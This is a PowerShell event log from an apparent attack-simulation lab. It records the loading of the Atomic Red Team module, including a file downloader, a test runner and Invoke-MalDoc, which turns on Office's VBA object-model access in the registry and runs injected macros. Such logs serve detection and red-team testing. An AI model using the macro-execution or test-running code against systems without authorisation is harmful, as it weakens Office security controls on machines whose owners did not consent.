Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\New-Atomic.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467183
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3b03116d-4ba1-473d-9874-645a61a777c8
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467182
Keywords=None
Message=Started invocation of ScriptBlock ID: 3b03116d-4ba1-473d-9874-645a61a777c8
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467181
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-WebRequestVerifyHash ($url, $outfile, $hash) {
    $success = $false
    $null = @( 
        New-Item -ItemType Directory (Split-Path $outfile) -Force | Out-Null
        $ms = New-Object IO.MemoryStream
        [Net.ServicePointManager]::SecurityProtocol = ([Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12)
        (New-Object System.Net.WebClient).OpenRead($url).copyto($ms)
        $ms.seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
        $actualHash = (Get-FileHash -InputStream $ms).Hash 
        if ( $hash -eq $actualHash) {
            $ms.seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
            $fileStream = New-Object IO.FileStream $outfile, ([System.IO.FileMode]::Create)
            $ms.CopyTo($fileStream);
            $fileStream.Close()
            $success = $true
        }
        else {
            Write-Host -ForegroundColor red "File hash mismatch, expected: $hash, actual: $actualHash" 
        }
    )
    $success
}


ScriptBlock ID: 3b03116d-4ba1-473d-9874-645a61a777c8
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Invoke-WebRequestVerifyHash.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467180
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4d56c70a-95bf-4a2b-9476-06e933a64139
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467179
Keywords=None
Message=Started invocation of ScriptBlock ID: 4d56c70a-95bf-4a2b-9476-06e933a64139
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467178
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-MalDoc {
    <#
    .SYNOPSIS
    A module to programatically execute Microsoft Word and Excel Documents containing macros.

    .DESCRIPTION
    A module to programatically execute Microsoft Word and Excel Documents containing macros. The module will temporarily add a registry key to allow PowerShell to interact with VBA.
    .PARAMETER macroCode
    [Required] The VBA code to be executed. By default, this macro code will be wrapped in a sub routine, called "Test" by default. If you don't want your macro code to be wrapped in a subroutine use the `-noWrap` flag. To specify the subroutine name use the `-sub` parameter.
    .PARAMETER macroFile
    [Required] A file containing the VBA code to be executed. To specify the subroutine name to be called use the `-sub` parameter.
    .PARAMETER officeVersion
    [Optional] The Microsoft Office version to use for executing the document. e.g. "16.0". The version will be determined Programmatically if not specified.
    .PARAMETER officeProduct
    [Required] The Microsoft Office application in which to create and execute the macro, either "Word" or "Excel".
    .PARAMETER sub
    [Optional] The name of the subroutine in the macro code to call for execution. Also the name of the subroutine to wrap the supplied `macroCode` in if `noWrap` is not specified.
    .PARAMETER noWrap
    [Optional] A switch that specifies that the supplied `macroCode` should be used as-is and not wrapped in a subroutine.
    
    .EXAMPLE
    C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Word"
    -----------
    Create a macro enabled Microsoft Word Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "Test" and then executed.
    
    .EXAMPLE
    C:\PS> $macroCode = Get-Content path/to/macro.txt -Raw
    C:\PS> Invoke-Maldoc -macroCode $macroCode -officeProduct "Word"
    -----------
    Create a macro enabled Microsoft Word Document. The macro code read from `path/to/macro.txt` will be wrapped inside of a subroutine call "Test" and then executed.
    
    .EXAMPLE
    C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Excel" -sub "DoIt"
    -----------
    Create a macro enabled Microsoft Excel Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "DoIt" and then executed.

    .EXAMPLE
    C:\PS> Invoke-Maldoc -macroCode "Sub Exec()`nMsgBox `"Hello`"`nEnd Sub" -officeProduct "Word" -noWrap -sub "Exec"
    -----------
    Create a macro enabled Microsoft Word Document. The macroCode will be unmodified (i.e. not wrapped insided a subroutine) and the "Exec" subroutine will be executed.

    .EXAMPLE
    C:\PS> Invoke-Maldoc -macroFile "C:\AtomicRedTeam\atomics\T1003\src\macro.txt" -officeProduct "Word" -sub "DoIt"
    -----------
    Create a macro enabled Microsoft Word Document. The macroCode will be read from the specified file and the "DoIt" subroutine will be executed.

#>

    Param(
        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "code")]
        [String]$macroCode,

        [Parameter(Position = 5, Mandatory = $True, ParameterSetName = "file")]
        [String]$macroFile,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]$officeVersion,

        [Parameter(Position = 2, Mandatory = $True)]
        [ValidateSet("Word", "Excel")]
        [String]$officeProduct,

        [Parameter(Position = 3, Mandatory = $false)]
        [String]$sub = "Test",

        [Parameter(Position = 4, Mandatory = $false, ParameterSetName = "code")]
        [switch]$noWrap
    )

    $app = New-Object -ComObject "$officeProduct.Application"
    if (-not $officeVersion) { $officeVersion = $app.Version } 
    $Key = "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\"
    if (-not (Test-Path $key)) { New-Item $Key }
    Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1

    if ($macroFile) {
        $macroCode = Get-Content $macroFile -Raw
    }
    elseif (-not $noWrap) {
        $macroCode = "Sub $sub()`n" + $macroCode + "`nEnd Sub"
    }

    if ($officeProduct -eq "Word") {
        $doc = $app.Documents.Add()
    }
    else {
        $doc = $app.Workbooks.Add()
    }
    $comp = $doc.VBProject.VBComponents.Add(1)
    $comp.CodeModule.AddFromString($macroCode)
    $app.Run($sub)
    $doc.Close(0)
    $app.Quit()
    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) | Out-Null
    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) | Out-Null
    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) | Out-Null
    [System.GC]::Collect()
    [System.GC]::WaitForPendingFinalizers()
    Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\" -Name 'AccessVBOM' -ErrorAction Ignore
}


ScriptBlock ID: 4d56c70a-95bf-4a2b-9476-06e933a64139
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Invoke-MalDoc.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467177
Keywords=None
Message=Completed invocation of ScriptBlock ID: 496c2724-d558-422b-a7d7-bc6c9cbe9f47
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467176
Keywords=None
Message=Started invocation of ScriptBlock ID: 496c2724-d558-422b-a7d7-bc6c9cbe9f47
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467175
Keywords=None
Message=Creating Scriptblock text (1 of 1):
<#
.SYNOPSIS
    Invokes specified Atomic test(s)
.DESCRIPTION
    Invokes specified Atomic tests(s).  Optionally, you can specify if you want to list the details of the Atomic test(s) only.
.EXAMPLE Check if Prerequisites for Atomic Test are met
    PS/> Invoke-AtomicTest T1117 -CheckPrereqs
.EXAMPLE Invokes Atomic Test
    PS/> Invoke-AtomicTest T1117
.EXAMPLE Run the Cleanup Commmand for the given Atomic Test
    PS/> Invoke-AtomicTest T1117 -Cleanup
.EXAMPLE Generate Atomic Test (Output Test Definition Details)
    PS/> Invoke-AtomicTest T1117 -ShowDetails
.EXAMPLE Invoke a test and flow the standard/error output to the console
    PS/> Invoke-AtomicTest T1117 -Interactive
.EXAMPLE Invoke a test and keep standard/error output files for later processing. This edge case has specific requirements. See https://github.com/redcanaryco/invoke-atomicredteam/issues/60
    PS/> Invoke-AtomicTest T1117 -KeepStdOutStdErrFiles
.NOTES
    Create Atomic Tests from yaml files described in Atomic Red Team. https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
.LINK
    Installation and Usage Wiki: https://github.com/redcanaryco/invoke-atomicredteam/wiki
    Github repo: https://github.com/redcanaryco/invoke-atomicredteam
#>
function Invoke-AtomicTest {
    [CmdletBinding(DefaultParameterSetName = 'technique',
        SupportsShouldProcess = $true,
        PositionalBinding = $false,
        ConfirmImpact = 'Medium')]
    Param(
        [Parameter(Mandatory = $true,
            Position = 0,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [ValidateNotNullOrEmpty()]
        [String]
        $AtomicTechnique,

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $ShowDetails,

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $ShowDetailsBrief,

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [String[]]
        $TestNumbers,

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [String[]]
        $TestNames,

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [String[]]
        $TestGuids,

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [String]
        $PathToAtomicsFolder = $( if ($IsLinux -or $IsMacOS) { $Env:HOME + "/AtomicRedTeam/atomics" } else { $env:HOMEDRIVE + "\AtomicRedTeam\atomics" }),

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $CheckPrereqs = $false,

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $PromptForInputArgs = $false,

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $GetPrereqs = $false,

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $Cleanup = $false,

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [switch]
        $NoExecutionLog = $false,

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [String]
        $ExecutionLogPath = $( if ($IsLinux -or $IsMacOS) { "/tmp/Invoke-AtomicTest-ExecutionLog.csv" } else { "$env:TEMP\Invoke-AtomicTest-ExecutionLog.csv" }),

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [switch]
        $Force,

        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [HashTable]
        $InputArgs,
    
        [Parameter(Mandatory = $false,
            ParameterSetName = 'technique')]
        [Int]
        $TimeoutSeconds = 120,

        [Parameter(Mandatory = $false, ParameterSetName = 'technique')]
        [System.Management.Automation.Runspaces.PSSession[]]$Session,

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $Interactive = $false,

        [Parameter(Mandatory = $false,
            ValueFromPipelineByPropertyName = $true,
            ParameterSetName = 'technique')]
        [switch]
        $KeepStdOutStdErrFiles = $false

    )
    BEGIN { } # Intentionally left blank and can be removed
    PROCESS {
        $PathToAtomicsFolder = (Resolve-Path $PathToAtomicsFolder).Path
        
        Write-Verbose -Message 'Attempting to run Atomic Techniques'
        Write-Host -ForegroundColor Cyan "PathToAtomicsFolder = $PathToAtomicsFolder`n"
        
        $targetPlatform, $isElevated, $tmpDir, $targetHostname, $targetUser = Get-TargetInfo $Session
        $PathToPayloads = if ($Session) { "$tmpDir`AtomicRedTeam" }  else { $PathToAtomicsFolder }

        function Invoke-AtomicTestSingle ($AT) {

            $AT = $AT.ToUpper()
            $pathToYaml = Join-Path $PathToAtomicsFolder "\$AT\$AT.yaml"
            if (Test-Path -Path $pathToYaml) { $AtomicTechniqueHash = Get-AtomicTechnique -Path $pathToYaml }
            else {
                Write-Host -Fore Red "ERROR: $PathToYaml does not exist`nCheck your Atomic Number and your PathToAtomicsFolder parameter"
                return
            }
            $techniqueCount = 0

            foreach ($technique in $AtomicTechniqueHash) {

                $techniqueCount++

                $props = @{
                    Activity        = "Running $($technique.display_name.ToString()) Technique"
                    Status          = 'Progress:'
                    PercentComplete = ($techniqueCount / ($AtomicTechniqueHash).Count * 100)
                }
                Write-Progress @props

                Write-Debug -Message "Gathering tests for Technique $technique"

                $testCount = 0
                foreach ($test in $technique.atomic_tests) {

                    Write-Verbose -Message 'Determining tests for target operating system'

                    $testCount++

                    if (-Not $test.supported_platforms.Contains($targetPlatform)) {
                        Write-Verbose -Message "Unable to run non-$targetPlatform tests"
                        continue
                    }

                    if ($null -ne $TestNumbers) {
                        if (-Not ($TestNumbers -contains $testCount) ) { continue }
                    }

                    if ($null -ne $TestNames) {
                        if (-Not ($TestNames -contains $test.name) ) { continue }
                    }

                    if ($null -ne $TestGuids) {
                        if (-Not ($TestGuids -contains $test.auto_generated_guid) ) { continue }
                    }

                    $props = @{
                        Activity        = 'Running Atomic Tests'
                        Status          = 'Progress:'
                        PercentComplete = ($testCount / ($technique.atomic_tests).Count * 100)
                    }
                    Write-Progress @props

                    Write-Verbose -Message 'Determining manual tests'

                    if ($test.executor.name.Contains('manual')) {
                        Write-Verbose -Message 'Unable to run manual tests'
                        continue
                    }

                    $testId = "$AT-$testCount $($test.name)"
                    if ($ShowDetailsBrief) {
                        Write-KeyValue $testId
                        continue
                    }

                    if ($PromptForInputArgs) {
                        $InputArgs = Invoke-PromptForInputArgs $test.input_arguments
                    }

                    if ($ShowDetails) {
                        Show-Details $test $testCount $technique $InputArgs $PathToPayloads
                        continue
                    }

                    Write-Debug -Message 'Gathering final Atomic test command'


                    if ($CheckPrereqs) {
                        Write-KeyValue "CheckPrereq's for: " $testId
                        $failureReasons = Invoke-CheckPrereqs $test $isElevated $InputArgs $PathToPayloads $TimeoutSeconds $session
                        Write-PrereqResults $FailureReasons $testId
                    }
                    elseif ($GetPrereqs) {
                        Write-KeyValue "GetPrereq's for: " $testId
                        if ( $test.executor.elevation_required -and -not $isElevated) {
                            Write-Host -ForegroundColor Red "Elevation required but not provided"
                        }
                        if ($nul -eq $test.dependencies) { Write-KeyValue "No Preqs Defined"; continue }
                        foreach ($dep in $test.dependencies) {
                            $executor = Get-PrereqExecutor $test
                            $description = (Merge-InputArgs $dep.description $test $InputArgs $PathToPayloads).trim()
                            Write-KeyValue  "Attempting to satisfy prereq: " $description
                            $final_command_prereq = Merge-InputArgs $dep.prereq_command $test $InputArgs $PathToPayloads
                            if ($executor -ne "powershell") { $final_command_prereq = ($final_command_prereq.trim()).Replace("`n", " && ") }
                            $final_command_get_prereq = Merge-InputArgs $dep.get_prereq_command $test $InputArgs $PathToPayloads
                            $res = Invoke-ExecuteCommand $final_command_prereq $executor $TimeoutSeconds $session -Interactive:$true

                            if ($res -eq 0) {
                                Write-KeyValue "Prereq already met: " $description
                            }
                            else {
                                $res = Invoke-ExecuteCommand $final_command_get_prereq $executor $TimeoutSeconds $session -Interactive:$Interactive
                                $res = Invoke-ExecuteCommand $final_command_prereq $executor $TimeoutSeconds $session -Interactive:$true
                                if ($res -eq 0) {
                                    Write-KeyValue "Prereq successfully met: " $description
                                }
                                else {
                                    Write-Host -ForegroundColor Red "Failed to meet prereq: $description"
                                }
                            }
                        }
                    }
                    elseif ($Cleanup) {
                        Write-KeyValue "Executing cleanup for test: " $testId
                        $final_command = Merge-InputArgs $test.executor.cleanup_command $test $InputArgs $PathToPayloads
                        $res = Invoke-ExecuteCommand $final_command $test.executor.name $TimeoutSeconds $session -Interactive:$Interactive
                        Write-KeyValue "Done executing cleanup for test: " $testId
                    }
                    else {
                        Write-KeyValue "Executing test: " $testId
                        $startTime = get-date
                        $final_command = Merge-InputArgs $test.executor.command $test $InputArgs $PathToPayloads
                        $res = Invoke-ExecuteCommand $final_command $test.executor.name $TimeoutSeconds $session -Interactive:$Interactive
                        Write-ExecutionLog $startTime $AT $testCount $test.name $ExecutionLogPath $targetHostname $targetUser $test.auto_generated_guid
                        Write-KeyValue "Done executing test: " $testId
                    }
                    if ($session) {
                        write-output (Invoke-Command -Session $session -scriptblock { (Get-Content $($Using:tmpDir + "art-out.txt")) -replace '\x00', ''; (Get-Content $($Using:tmpDir + "art-err.txt")) -replace '\x00', ''; if(-not $KeepStdOutStdErrFiles) { Remove-Item $($Using:tmpDir + "art-out.txt"), $($Using:tmpDir + "art-err.txt") -Force -ErrorAction Ignore }})
                    }
                    elseif (-not $interactive) {
                        # It is possible to have a null $session BUT also have stdout and stderr captured from 
                        #   the executed command. IF so then write the output to the pipe and cleanup the files.
                        $stdoutFilename = $tmpDir + "art-out.txt"
                        if (Test-Path $stdoutFilename -PathType leaf) { 
                            Write-Output ((Get-Content $stdoutFilename) -replace '\x00', '')
                            if(-not $KeepStdOutStdErrFiles) {
                                Remove-Item $stdoutFilename
                            }
                        }
                        $stderrFilename = $tmpDir + "art-err.txt"
                        if (Test-Path $stderrFilename -PathType leaf) { 
                            Write-Output ((Get-Content $stderrFilename) -replace '\x00', '')
                            if(-not $KeepStdOutStdErrFiles) { 
                                Remove-Item $stderrFilename
                            }
                        }
                    }
                } # End of foreach Test in single Atomic Technique
            } # End of foreach Technique in Atomic Tests
        } # End of Invoke-AtomicTestSingle function

        if ($AtomicTechnique -eq "All") {
            function Invoke-AllTests() {
                $AllAtomicTests = New-Object System.Collections.ArrayList
                Get-ChildItem $PathToAtomicsFolder -Directory -Filter T* | ForEach-Object {
                    $currentTechnique = [System.IO.Path]::GetFileName($_.FullName)
                    if ( $currentTechnique -match "T[0-9]{4}.?([0-9]{3})?" ) { $AllAtomicTests.Add($currentTechnique) | Out-Null }
                }
                $AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTestSingle $_ }
            }
        
            if ( ($Force -or $CheckPrereqs -or $ShowDetails -or $ShowDetailsBrief -or $GetPrereqs) -or $psCmdlet.ShouldContinue( 'Do you wish to execute all tests?',
                    "Highway to the danger zone, Executing All Atomic Tests!" ) ) {
                Invoke-AllTests
            }
        }
        else {
            Invoke-AtomicTestSingle $AtomicTechnique
        }

    } # End of PROCESS block
    END { } # Intentionally left blank and can be removed
}


ScriptBlock ID: 496c2724-d558-422b-a7d7-bc6c9cbe9f47
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Invoke-AtomicTest.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467174
Keywords=None
Message=Completed invocation of ScriptBlock ID: 871882b4-86e5-4a1a-85c3-493facc5b9d9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467173
Keywords=None
Message=Started invocation of ScriptBlock ID: 871882b4-86e5-4a1a-85c3-493facc5b9d9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467172
Keywords=None
Message=Creating Scriptblock text (2 of 2):
arguments' must be a hashtable."
                    return
                }

                if (-not ($AtomicTest['input_arguments'].Count)) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].input_arguments' must have at least one entry."
                    return
                }

                $InputArguments = @{}

                $j = 0

                foreach ($InputArgName in $AtomicTest['input_arguments'].Keys) {
                    $InputArgument = [AtomicInputArgument]::new()

                    if (-not $AtomicTest['input_arguments'][$InputArgName].ContainsKey('description')) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].input_arguments['$InputArgName'].description' element is required."
                        return
                    }

                    if (-not ($AtomicTest['input_arguments'][$InputArgName]['description'] -is [String])) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].input_arguments['$InputArgName'].description' element must be a string."
                        return
                    }

                    $InputArgument.description = $AtomicTest['input_arguments'][$InputArgName]['description']

                    if (-not $AtomicTest['input_arguments'][$InputArgName].ContainsKey('type')) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].input_arguments['$InputArgName'].type' element is required."
                        return
                    }

                    if ($ValidInputArgTypes -notcontains $AtomicTest['input_arguments'][$InputArgName]['type']) {
                        Write-Warning "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].input_arguments['$InputArgName'].type': '$($AtomicTest['input_arguments'][$InputArgName]['type'])' should be one of the following: $($ValidInputArgTypes -join ', ')"
                    }

                    $InputArgument.type = $AtomicTest['input_arguments'][$InputArgName]['type']

                    if (-not $AtomicTest['input_arguments'][$InputArgName].ContainsKey('default')) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].input_arguments['$InputArgName'].default' element is required."
                        return
                    }

                    $InputArgument.default = $AtomicTest['input_arguments'][$InputArgName]['default']

                    $InputArguments[$InputArgName] = $InputArgument

                    $j++
                }
            }

            $AtomicTestInstance.input_arguments = $InputArguments

            if (-not $AtomicTest.ContainsKey('executor')) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor' element is required."
                return
            }

            if (-not ($AtomicTest['executor'] -is [Hashtable])) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor' element must be a hashtable."
                return
            }

            if (-not $AtomicTest['executor'].ContainsKey('name')) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor.name' element is required."
                return
            }

            if (-not ($AtomicTest['executor']['name'] -is [String])) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].description.name' element must be a string."
                return
            }

            if ($AtomicTest['executor']['name'] -notmatch '^(?-i:[a-z_]+)$') {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].description.name' element must be lowercased and underscored."
                return
            }

            if ($ValidExecutorTypes -notcontains $AtomicTest['executor']['name']) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].description.name': '$($AtomicTest['executor']['name'])' must be one of the following: $($ValidExecutorTypes -join ', ')"
                return
            }

            if ($AtomicTest['executor']['name'] -eq 'manual') {
                if (-not $AtomicTest['executor'].ContainsKey('steps')) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor.steps' element is required when the 'manual' executor is used."
                    return
                }

                if (-not ($AtomicTest['executor']['steps'] -is [String])) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor.steps' element must be a string."
                    return
                }

                $ExecutorInstance = [AtomicExecutorManual]::new()
                $ExecutorInstance.steps = $AtomicTest['executor']['steps']
                $StringsWithPotentialInputArgs.Add($AtomicTest['executor']['steps'])
            } else {
                if (-not $AtomicTest['executor'].ContainsKey('command')) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor.command' element is required when the '$($ValidExecutorTypes -join ', ')' executors are used."
                    return
                }

                if (-not ($AtomicTest['executor']['command'] -is [String])) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor.command' element must be a string."
                    return
                }

                $ExecutorInstance = [AtomicExecutorDefault]::new()
                $ExecutorInstance.command = $AtomicTest['executor']['command']
                $StringsWithPotentialInputArgs.Add($AtomicTest['executor']['command'])
            }

            # cleanup_command element is optional
            if ($AtomicTest['executor'].ContainsKey('cleanup_command')) {
                $ExecutorInstance.cleanup_command = $AtomicTest['executor']['cleanup_command']
                $StringsWithPotentialInputArgs.Add($AtomicTest['executor']['cleanup_command'])
            }

            # elevation_required element is optional
            if ($AtomicTest['executor'].ContainsKey('elevation_required')) {
                if (-not ($AtomicTest['executor']['elevation_required'] -is [Bool])) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].executor.elevation_required' element must be a boolean."
                    return
                }

                $ExecutorInstance.elevation_required = $AtomicTest['executor']['elevation_required']
            } else {
                # if elevation_required is not present, default to false
                $ExecutorInstance.elevation_required = $False
            }

            $InputArgumentNames = $null

            # Get all input argument names
            $InputArgumentNames = $InputArguments.Keys

            # Extract all input arguments names from the executor
            # Potential places where input arguments can be populated:
            #  - Dependency description
            #  - Dependency prereq_command
            #  - Dependency get_prereq_command
            #  - Executor steps
            #  - Executor command
            #  - Executor cleanup_command

            $Regex = [Regex] '#\{(?<ArgName>[^}]+)\}'
            [String[]] $InputArgumentNamesFromExecutor = $StringsWithPotentialInputArgs |
                ForEach-Object { $Regex.Matches($_) } |
                Select-Object -ExpandProperty Groups |
                Where-Object { $_.Name -eq 'ArgName' } |
                Select-Object -ExpandProperty Value |
                Sort-Object -Unique


            # Validate that all executor input arg names are defined input arg names.
            if ($InputArgumentNamesFromExecutor.Count) {
                $InputArgumentNamesFromExecutor | ForEach-Object {
                    if ($InputArgumentNames -notcontains $_) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] The following input argument was specified but is not defined: '$_'"
                        return
                    }
                }
            }

            # Validate that all defined input args are utilized at least once in the executor.
            if ($InputArgumentNames.Count) {
                $InputArgumentNames | ForEach-Object {
                    if ($InputArgumentNamesFromExecutor -notcontains $_) {
                        # Write a warning since this scenario is not considered a breaking change
                        Write-Warning "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] The following input argument is defined but not utilized: '$_'."
                    }
                }
            }

            $ExecutorInstance.name = $AtomicTest['executor']['name']

